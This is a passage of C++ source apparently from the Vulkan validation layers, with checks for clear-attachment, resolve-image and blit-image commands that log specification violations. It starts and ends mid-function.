uint32_t regionCount, const VkImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); // Make sure that all image slices are updated to correct layout for (uint32_t i = 0; i < regionCount; ++i) { SetImageLayout(cb_node, src_image_state, pRegions[i].srcSubresource, srcImageLayout); SetImageLayout(cb_node, dst_image_state, pRegions[i].dstSubresource, dstImageLayout); } // Update bindings between images and cmd buffer AddCommandBufferBindingImage(cb_node, src_image_state); AddCommandBufferBindingImage(cb_node, dst_image_state); } // Returns true if sub_rect is entirely contained within rect static inline bool ContainsRect(VkRect2D rect, VkRect2D sub_rect) { if ((sub_rect.offset.x < rect.offset.x) || (sub_rect.offset.x + sub_rect.extent.width > rect.offset.x + rect.extent.width) || (sub_rect.offset.y < rect.offset.y) || (sub_rect.offset.y + sub_rect.extent.height > rect.offset.y + rect.extent.height)) return false; return true; } bool CoreChecks::ValidateClearAttachmentExtent(VkCommandBuffer command_buffer, uint32_t attachment_index, FRAMEBUFFER_STATE *framebuffer, uint32_t fb_attachment, const VkRect2D &render_area, uint32_t rect_count, const VkClearRect *clear_rects) { bool skip = false; const IMAGE_VIEW_STATE *image_view_state = nullptr; if (framebuffer && (fb_attachment != VK_ATTACHMENT_UNUSED) && (fb_attachment < framebuffer->createInfo.attachmentCount)) { image_view_state = GetImageViewState(framebuffer->createInfo.pAttachments[fb_attachment]); } for (uint32_t j = 0; j < rect_count; j++) { if (!ContainsRect(render_area, clear_rects[j].rect)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-vkCmdClearAttachments-pRects-00016", "vkCmdClearAttachments(): The area defined by pRects[%d] is not contained in the area of " "the current render pass instance.", j); } if (image_view_state) { // The layers specified by a given element of pRects must be contained within every attachment that // pAttachments refers to const auto attachment_layer_count = image_view_state->create_info.subresourceRange.layerCount; if ((clear_rects[j].baseArrayLayer >= attachment_layer_count) || (clear_rects[j].baseArrayLayer + clear_rects[j].layerCount > attachment_layer_count)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(command_buffer), "VUID-vkCmdClearAttachments-pRects-00017", "vkCmdClearAttachments(): The layers defined in pRects[%d] are not contained in the layers " "of pAttachment[%d].", j, attachment_index); } } } return skip; } bool CoreChecks::PreCallValidateCmdClearAttachments(VkCommandBuffer commandBuffer, uint32_t attachmentCount, const VkClearAttachment *pAttachments, uint32_t rectCount, const VkClearRect *pRects) { GLOBAL_CB_NODE *cb_node = GetCBNode(commandBuffer); bool skip = false; if (cb_node) { skip |= ValidateCmdQueueFlags(cb_node, "vkCmdClearAttachments()", VK_QUEUE_GRAPHICS_BIT, "VUID-vkCmdClearAttachments-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_CLEARATTACHMENTS, "vkCmdClearAttachments()"); // Warn if this is issued prior to Draw Cmd and clearing the entire attachment if (!cb_node->hasDrawCmd && (cb_node->activeRenderPassBeginInfo.renderArea.extent.width == pRects[0].rect.extent.width) && (cb_node->activeRenderPassBeginInfo.renderArea.extent.height == pRects[0].rect.extent.height)) { // There are times where app needs to use ClearAttachments (generally when reusing a buffer inside of a render pass) // This warning should be made more specific. It'd be best to avoid triggering this test if it's a use that must call // CmdClearAttachments. skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), kVUID_Core_DrawState_ClearCmdBeforeDraw, "vkCmdClearAttachments() issued on command buffer object %s prior to any Draw Cmds. It is recommended you " "use RenderPass LOAD_OP_CLEAR on Attachments prior to any Draw.", report_data->FormatHandle(commandBuffer).c_str()); } skip |= OutsideRenderPass(cb_node, "vkCmdClearAttachments()", "VUID-vkCmdClearAttachments-renderpass"); } // Validate that attachment is in reference list of active subpass if (cb_node->activeRenderPass) { const VkRenderPassCreateInfo2KHR *renderpass_create_info = cb_node->activeRenderPass->createInfo.ptr(); const uint32_t renderpass_attachment_count = renderpass_create_info->attachmentCount; const VkSubpassDescription2KHR *subpass_desc = &renderpass_create_info->pSubpasses[cb_node->activeSubpass]; auto framebuffer = GetFramebufferState(cb_node->activeFramebuffer); const auto &render_area = cb_node->activeRenderPassBeginInfo.renderArea; std::shared_ptr<std::vector<VkClearRect>> clear_rect_copy; for (uint32_t attachment_index = 0; attachment_index < attachmentCount; attachment_index++) { auto clear_desc = &pAttachments[attachment_index]; uint32_t fb_attachment = VK_ATTACHMENT_UNUSED; if (0 == clear_desc->aspectMask) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-VkClearAttachment-aspectMask-requiredbitmask", " "); } else if (clear_desc->aspectMask & VK_IMAGE_ASPECT_METADATA_BIT) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-VkClearAttachment-aspectMask-00020", " "); } else if (clear_desc->aspectMask & VK_IMAGE_ASPECT_COLOR_BIT) { uint32_t color_attachment = VK_ATTACHMENT_UNUSED; if (clear_desc->colorAttachment < subpass_desc->colorAttachmentCount) { color_attachment = subpass_desc->pColorAttachments[clear_desc->colorAttachment].attachment; if ((color_attachment != VK_ATTACHMENT_UNUSED) && (color_attachment >= renderpass_attachment_count)) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-vkCmdClearAttachments-aspectMask-02501", "vkCmdClearAttachments() pAttachments[%u].colorAttachment=%u is not VK_ATTACHMENT_UNUSED " "and not a valid attachment for render pass %s attachmentCount=%u. Subpass %u pColorAttachment[%u]=%u.", attachment_index, clear_desc->colorAttachment, report_data->FormatHandle(cb_node->activeRenderPass->renderPass).c_str(), cb_node->activeSubpass, clear_desc->colorAttachment, color_attachment, renderpass_attachment_count); color_attachment = VK_ATTACHMENT_UNUSED; // Defensive, prevent lookup past end of renderpass attachment } } else { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-vkCmdClearAttachments-aspectMask-02501", "vkCmdClearAttachments() pAttachments[%u].colorAttachment=%u out of range for render pass %s" " subpass %u. colorAttachmentCount=%u", attachment_index, clear_desc->colorAttachment, report_data->FormatHandle(cb_node->activeRenderPass->renderPass).c_str(), cb_node->activeSubpass, subpass_desc->colorAttachmentCount); } fb_attachment = color_attachment; if ((clear_desc->aspectMask & VK_IMAGE_ASPECT_DEPTH_BIT) || (clear_desc->aspectMask & VK_IMAGE_ASPECT_STENCIL_BIT)) { char const str[] = "vkCmdClearAttachments() aspectMask [%d] must set only VK_IMAGE_ASPECT_COLOR_BIT of a color attachment."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-VkClearAttachment-aspectMask-00019", str, attachment_index); } } else { // Must be depth and/or stencil if (((clear_desc->aspectMask & VK_IMAGE_ASPECT_DEPTH_BIT) != VK_IMAGE_ASPECT_DEPTH_BIT) && ((clear_desc->aspectMask & VK_IMAGE_ASPECT_STENCIL_BIT) != VK_IMAGE_ASPECT_STENCIL_BIT)) { char const str[] = "vkCmdClearAttachments() aspectMask [%d] is not a valid combination of bits."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), "VUID-VkClearAttachment-aspectMask-parameter", str, attachment_index); } if (!subpass_desc->pDepthStencilAttachment || (subpass_desc->pDepthStencilAttachment->attachment == VK_ATTACHMENT_UNUSED)) { skip |= log_msg( report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), kVUID_Core_DrawState_MissingAttachmentReference, "vkCmdClearAttachments() depth/stencil clear with no depth/stencil attachment in subpass; ignored"); } else { fb_attachment = subpass_desc->pDepthStencilAttachment->attachment; } } if (cb_node->createInfo.level == VK_COMMAND_BUFFER_LEVEL_PRIMARY) { skip |= ValidateClearAttachmentExtent(commandBuffer, attachment_index, framebuffer, fb_attachment, render_area, rectCount, pRects); } else { // if a secondary level command buffer inherits the framebuffer from the primary command buffer // (see VkCommandBufferInheritanceInfo), this validation must be deferred until queue submit time if (!clear_rect_copy) { // We need a copy of the clear rectangles that will persist until the last lambda executes // but we want to create it as lazily as possible clear_rect_copy.reset(new std::vector<VkClearRect>(pRects, pRects + rectCount)); } auto val_fn = [this, commandBuffer, attachment_index, fb_attachment, rectCount, clear_rect_copy]( GLOBAL_CB_NODE *prim_cb, VkFramebuffer fb) { assert(rectCount == clear_rect_copy->size()); FRAMEBUFFER_STATE *framebuffer = GetFramebufferState(fb); const auto &render_area = prim_cb->activeRenderPassBeginInfo.renderArea; bool skip = false; skip = ValidateClearAttachmentExtent(commandBuffer, attachment_index, framebuffer, fb_attachment, render_area, rectCount, clear_rect_copy->data()); return skip; }; cb_node->cmd_execute_commands_functions.emplace_back(val_fn); } } } return skip; } bool CoreChecks::PreCallValidateCmdResolveImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkImageResolve *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); bool skip = false; if (cb_node && src_image_state && dst_image_state) { skip |= ValidateMemoryIsBoundToImage(src_image_state, "vkCmdResolveImage()", "VUID-vkCmdResolveImage-srcImage-00256"); skip |= ValidateMemoryIsBoundToImage(dst_image_state, "vkCmdResolveImage()", "VUID-vkCmdResolveImage-dstImage-00258"); skip |= ValidateCmdQueueFlags(cb_node, "vkCmdResolveImage()", VK_QUEUE_GRAPHICS_BIT, "VUID-vkCmdResolveImage-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_RESOLVEIMAGE, "vkCmdResolveImage()"); skip |= InsideRenderPass(cb_node, "vkCmdResolveImage()", "VUID-vkCmdResolveImage-renderpass"); skip |= ValidateImageFormatFeatureFlags(dst_image_state, VK_FORMAT_FEATURE_COLOR_ATTACHMENT_BIT, "vkCmdResolveImage()", "VUID-vkCmdResolveImage-dstImage-02003", "VUID-vkCmdResolveImage-dstImage-02003"); bool hit_error = false; const char *invalid_src_layout_vuid = (src_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdResolveImage-srcImageLayout-01400" : "VUID-vkCmdResolveImage-srcImageLayout-00261"; const char *invalid_dst_layout_vuid = (dst_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdResolveImage-dstImageLayout-01401" : "VUID-vkCmdResolveImage-dstImageLayout-00263"; // For each region, the number of layers in the image subresource should not be zero // For each region, src and dest image aspect must be color only for (uint32_t i = 0; i < regionCount; i++) { skip |= ValidateImageSubresourceLayers(cb_node, &pRegions[i].srcSubresource, "vkCmdResolveImage()", "srcSubresource", i); skip |= ValidateImageSubresourceLayers(cb_node, &pRegions[i].dstSubresource, "vkCmdResolveImage()", "dstSubresource", i); skip |= VerifyImageLayout(cb_node, src_image_state, pRegions[i].srcSubresource, srcImageLayout, VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL, "vkCmdResolveImage()", invalid_src_layout_vuid, "VUID-vkCmdResolveImage-srcImageLayout-00260", &hit_error); skip |= VerifyImageLayout(cb_node, dst_image_state, pRegions[i].dstSubresource, dstImageLayout, VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL, "vkCmdResolveImage()", invalid_dst_layout_vuid, "VUID-vkCmdResolveImage-dstImageLayout-00262", &hit_error); skip |= ValidateImageMipLevel(cb_node, src_image_state, pRegions[i].srcSubresource.mipLevel, i, "vkCmdResolveImage()", "srcSubresource", "VUID-vkCmdResolveImage-srcSubresource-01709"); skip |= ValidateImageMipLevel(cb_node, dst_image_state, pRegions[i].dstSubresource.mipLevel, i, "vkCmdResolveImage()", "dstSubresource", "VUID-vkCmdResolveImage-dstSubresource-01710"); skip |= ValidateImageArrayLayerRange(cb_node, src_image_state, pRegions[i].srcSubresource.baseArrayLayer, pRegions[i].srcSubresource.layerCount, i, "vkCmdResolveImage()", "srcSubresource", "VUID-vkCmdResolveImage-srcSubresource-01711"); skip |= ValidateImageArrayLayerRange(cb_node, dst_image_state, pRegions[i].dstSubresource.baseArrayLayer, pRegions[i].dstSubresource.layerCount, i, "vkCmdResolveImage()", "srcSubresource", "VUID-vkCmdResolveImage-dstSubresource-01712"); // layer counts must match if (pRegions[i].srcSubresource.layerCount != pRegions[i].dstSubresource.layerCount) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageResolve-layerCount-00267", "vkCmdResolveImage(): layerCount in source and destination subresource of pRegions[%d] does not match.", i); } // For each region, src and dest image aspect must be color only if ((pRegions[i].srcSubresource.aspectMask != VK_IMAGE_ASPECT_COLOR_BIT) || (pRegions[i].dstSubresource.aspectMask != VK_IMAGE_ASPECT_COLOR_BIT)) { char const str[] = "vkCmdResolveImage(): src and dest aspectMasks for each region must specify only VK_IMAGE_ASPECT_COLOR_BIT"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageResolve-aspectMask-00266", "%s.", str); } } if (src_image_state->createInfo.format != dst_image_state->createInfo.format) { char const str[] = "vkCmdResolveImage called with unmatched source and dest formats."; skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), kVUID_Core_DrawState_MismatchedImageFormat, str); } if (src_image_state->createInfo.imageType != dst_image_state->createInfo.imageType) { char const str[] = "vkCmdResolveImage called with unmatched source and dest image types."; skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), kVUID_Core_DrawState_MismatchedImageType, str); } if (src_image_state->createInfo.samples == VK_SAMPLE_COUNT_1_BIT) { char const str[] = "vkCmdResolveImage called with source sample count less than 2."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdResolveImage-srcImage-00257", "%s.", str); } if (dst_image_state->createInfo.samples != VK_SAMPLE_COUNT_1_BIT) { char const str[] = "vkCmdResolveImage called with dest sample count greater than 1."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdResolveImage-dstImage-00259", "%s.", str); } } else { assert(0); } return skip; } void CoreChecks::PreCallRecordCmdResolveImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkImageResolve *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); // Update bindings between images and cmd buffer AddCommandBufferBindingImage(cb_node, src_image_state); AddCommandBufferBindingImage(cb_node, dst_image_state); } bool CoreChecks::PreCallValidateCmdBlitImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkImageBlit *pRegions, VkFilter filter) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); bool skip = false; if (cb_node) { skip |= ValidateCmd(cb_node, CMD_BLITIMAGE, "vkCmdBlitImage()"); } if (cb_node && src_image_state && dst_image_state) { skip |= ValidateImageSampleCount(src_image_state, VK_SAMPLE_COUNT_1_BIT, "vkCmdBlitImage(): srcImage", "VUID-vkCmdBlitImage-srcImage-00233"); skip |= ValidateImageSampleCount(dst_image_state, VK_SAMPLE_COUNT_1_BIT, "vkCmdBlitImage(): dstImage", "VUID-vkCmdBlitImage-dstImage-00234"); skip |= ValidateMemoryIsBoundToImage(src_image_state, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-srcImage-00220"); skip |= ValidateMemoryIsBoundToImage(dst_image_state, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-dstImage-00225"); skip |= ValidateImageUsageFlags(src_image_state, VK_IMAGE_USAGE_TRANSFER_SRC_BIT, true, "VUID-vkCmdBlitImage-srcImage-00219", "vkCmdBlitImage()", "VK_IMAGE_USAGE_TRANSFER_SRC_BIT"); skip |= ValidateImageUsageFlags(dst_image_state, VK_IMAGE_USAGE_TRANSFER_DST_BIT, true, "VUID-vkCmdBlitImage-dstImage-00224", "vkCmdBlitImage()", "VK_IMAGE_USAGE_TRANSFER_DST_BIT"); skip |= ValidateCmdQueueFlags(cb_node, "vkCmdBlitImage()", VK_QUEUE_GRAPHICS_BIT, "VUID-vkCmdBlitImage-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_BLITIMAGE, "vkCmdBlitImage()"); skip |= InsideRenderPass(cb_node, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-renderpass"); skip |= ValidateImageFormatFeatureFlags(src_image_state, VK_FORMAT_FEATURE_BLIT_SRC_BIT, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-srcImage-01999", "VUID-vkCmdBlitImage-srcImage-01999"); skip |= ValidateImageFormatFeatureFlags(dst_image_state, VK_FORMAT_FEATURE_BLIT_DST_BIT, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-dstImage-02000", "VUID-vkCmdBlitImage-dstImage-02000"); // TODO: Need to validate image layouts, which will include layout validation for shared presentable images VkFormat src_format = src_image_state->createInfo.format; VkFormat dst_format = dst_image_state->createInfo.format; VkImageType src_type = src_image_state->createInfo.imageType; VkImageType dst_type = dst_image_state->createInfo.imageType; if (VK_FILTER_LINEAR == filter) { skip |= ValidateImageFormatFeatureFlags(src_image_state, VK_FORMAT_FEATURE_SAMPLED_IMAGE_FILTER_LINEAR_BIT, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-filter-02001", "VUID-vkCmdBlitImage-filter-02001"); } else if (VK_FILTER_CUBIC_IMG == filter) { skip |= ValidateImageFormatFeatureFlags(src_image_state, VK_FORMAT_FEATURE_SAMPLED_IMAGE_FILTER_CUBIC_BIT_IMG, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-filter-02002", "VUID-vkCmdBlitImage-filter-02002"); } if ((VK_FILTER_CUBIC_IMG == filter) && (VK_IMAGE_TYPE_3D != src_type)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-filter-00237", "vkCmdBlitImage(): source image type must be VK_IMAGE_TYPE_3D when cubic filtering is specified."); } if ((VK_SAMPLE_COUNT_1_BIT != src_image_state->createInfo.samples) || (VK_SAMPLE_COUNT_1_BIT != dst_image_state->createInfo.samples)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-srcImage-00228", "vkCmdBlitImage(): source or dest image has sample count other than VK_SAMPLE_COUNT_1_BIT."); } // Validate consistency for unsigned formats if (FormatIsUInt(src_format) != FormatIsUInt(dst_format)) { std::stringstream ss; ss << "vkCmdBlitImage(): If one of srcImage and dstImage images has unsigned integer format, " << "the other one must also have unsigned integer format. " << "Source format is " << string_VkFormat(src_format) << " Destination format is " << string_VkFormat(dst_format); skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-srcImage-00230", "%s.", ss.str().c_str()); } // Validate consistency for signed formats if (FormatIsSInt(src_format) != FormatIsSInt(dst_format)) { std::stringstream ss; ss << "vkCmdBlitImage(): If one of srcImage and dstImage images has signed integer format, " << "the other one must also have signed integer format. " << "Source format is " << string_VkFormat(src_format) << " Destination format is " << string_VkFormat(dst_format); skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-srcImage-00229", "%s.", ss.str().c_str()); } // Validate filter for Depth/Stencil formats if (FormatIsDepthOrStencil(src_format) && (filter != VK_FILTER_NEAREST)) { std::stringstream ss; ss << "vkCmdBlitImage(): If the format of srcImage is a depth, stencil, or depth stencil " << "then filter must be VK_FILTER_NEAREST."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-srcImage-00232", "%s.", ss.str().c_str()); } // Validate aspect bits and formats for depth/stencil images if (FormatIsDepthOrStencil(src_format) || FormatIsDepthOrStencil(dst_format)) { if (src_format != dst_format) { std::stringstream ss; ss << "vkCmdBlitImage(): If one of srcImage and dstImage images has a format of depth, stencil or depth " << "stencil, the other one must have exactly the same format. " << "Source format is " << string_VkFormat(src_format) << " Destination format is " << string_VkFormat(dst_format); skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-srcImage-00231", "%s.", ss.str().c_str()); } } // Depth or Stencil // Do per-region checks const char *invalid_src_layout_vuid = (src_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdBlitImage-srcImageLayout-01398" : "VUID-vkCmdBlitImage-srcImageLayout-00222"; const char *invalid_dst_layout_vuid = (dst_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdBlitImage-dstImageLayout-01399" : "VUID-vkCmdBlitImage-dstImageLayout-00227"; for (uint32_t i = 0; i < regionCount; i++) { const VkImageBlit rgn = pRegions[i]; bool hit_error = false; skip |= VerifyImageLayout(cb_node, src_image_state, rgn.srcSubresource, srcImageLayout, VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL, "vkCmdBlitImage()", invalid_src_layout_vuid, "VUID-vkCmdBlitImage-srcImageLayout-00221", &hit_error); skip |= VerifyImageLayout(cb_node, dst_image_state, rgn.dstSubresource, dstImageLayout, VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL, "vkCmdBlitImage()", invalid_dst_layout_vuid, "VUID-vkCmdBlitImage-dstImageLayout-00226", &hit_error); skip |= ValidateImageSubresourceLayers(cb_node, &rgn.srcSubresource, "vkCmdBlitImage()", "srcSubresource", i); skip |= ValidateImageSubresourceLayers(cb_node, &rgn.dstSubresource, "vkCmdBlitImage()", "dstSubresource", i); skip |= ValidateImageMipLevel(cb_node, src_image_state, rgn.srcSubresource.mipLevel, i, "vkCmdBlitImage()", "srcSubresource", "VUID-vkCmdBlitImage-srcSubresource-01705"); skip |= ValidateImageMipLevel(cb_node, dst_image_state, rgn.dstSubresource.mipLevel, i, "vkCmdBlitImage()", "dstSubresource", "VUID-vkCmdBlitImage-dstSubresource-01706"); skip |= ValidateImageArrayLayerRange(cb_node, src_image_state, rgn.srcSubresource.baseArrayLayer, rgn.srcSubresource.layerCount, i, "vkCmdBlitImage()", "srcSubresource", "VUID-vkCmdBlitImage-srcSubresource-01707"); skip |= ValidateImageArrayLayerRange(cb_node, dst_image_state, rgn.dstSubresource.baseArrayLayer, rgn.dstSubresource.layerCount, i, "vkCmdBlitImage()", "dstSubresource", "VUID-vkCmdBlitImage-dstSubresource-01708"); // Warn for zero-sized regions if ((rgn.srcOffsets[0].x == rgn.srcOffsets[1].x) || (rgn.srcOffsets[0].y == rgn.srcOffsets[1].y) || (rgn.srcOffsets[0].z == rgn.srcOffsets[1].z)) { std::stringstream ss; ss << "vkCmdBlitImage(): pRegions[" << i << "].srcOffsets specify a zero-volume area."; skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), kVUID_Core_DrawState_InvalidExtents, "%s", ss.str().c_str()); } if ((rgn.dstOffsets[0].x == rgn.dstOffsets[1].x) || (rgn.dstOffsets[0].y == rgn.dstOffsets[1].y) || (rgn.dstOffsets[0].z == rgn.dstOffsets[1].z)) { std::stringstream ss; ss << "vkCmdBlitImage(): pRegions[" << i << "].dstOffsets specify a zero-volume area."; skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), kVUID_Core_DrawState_InvalidExtents, "%s", ss.str().c_str()); } // Check that src/dst layercounts match if (rgn.srcSubresource.layerCount != rgn.dstSubresource.layerCount) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-layerCount-00239", "vkCmdBlitImage(): layerCount in source and destination subresource of pRegions[%d] does not match.", i); } if (rgn.srcSubresource.aspectMask != rgn.dstSubresource.aspectMask) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-aspectMask-00238", "vkCmdBlitImage(): aspectMask members for pRegion[%d] do not match.", i); } if (!VerifyAspectsPresent(rgn.srcSubresource.aspectMask, src_format)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-aspectMask-00241", "vkCmdBlitImage(): region [%d] source aspectMask (0x%x) specifies aspects not present in source " "image format %s.", i, rgn.srcSubresource.aspectMask, string_VkFormat(src_format)); } if (!VerifyAspectsPresent(rgn.dstSubresource.aspectMask, dst_format)) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-aspectMask-00242", "vkCmdBlitImage(): region [%d] dest aspectMask (0x%x) specifies aspects not present in dest image format %s.", i, rgn.dstSubresource.aspectMask, string_VkFormat(dst_format)); } // Validate source image offsets VkExtent3D src_extent = GetImageSubresourceExtent(src_image_state, &(rgn.srcSubresource)); if (VK_IMAGE_TYPE_1D == src_type) { if ((0 != rgn.srcOffsets[0].y) || (1 != rgn.srcOffsets[1].y)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcImage-00245", "vkCmdBlitImage(): region [%d], source image of type VK_IMAGE_TYPE_1D with srcOffset[].y values " "of (%1d, %1d). These must be (0, 1).", i, rgn.srcOffsets[0].y, rgn.srcOffsets[1].y); } } if ((VK_IMAGE_TYPE_1D == src_type) || (VK_IMAGE_TYPE_2D == src_type)) { if ((0 != rgn.srcOffsets[0].z) || (1 != rgn.srcOffsets[1].z)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcImage-00247", "vkCmdBlitImage(): region [%d], source image of type VK_IMAGE_TYPE_1D or VK_IMAGE_TYPE_2D with " "srcOffset[].z values of (%1d, %1d). These must be (0, 1).", i, rgn.srcOffsets[0].z, rgn.srcOffsets[1].z); } } bool oob = false; if ((rgn.srcOffsets[0].x < 0) || (rgn.srcOffsets[0].x > static_cast<int32_t>(src_extent.width)) || (rgn.srcOffsets[1].x < 0) || (rgn.srcOffsets[1].x > 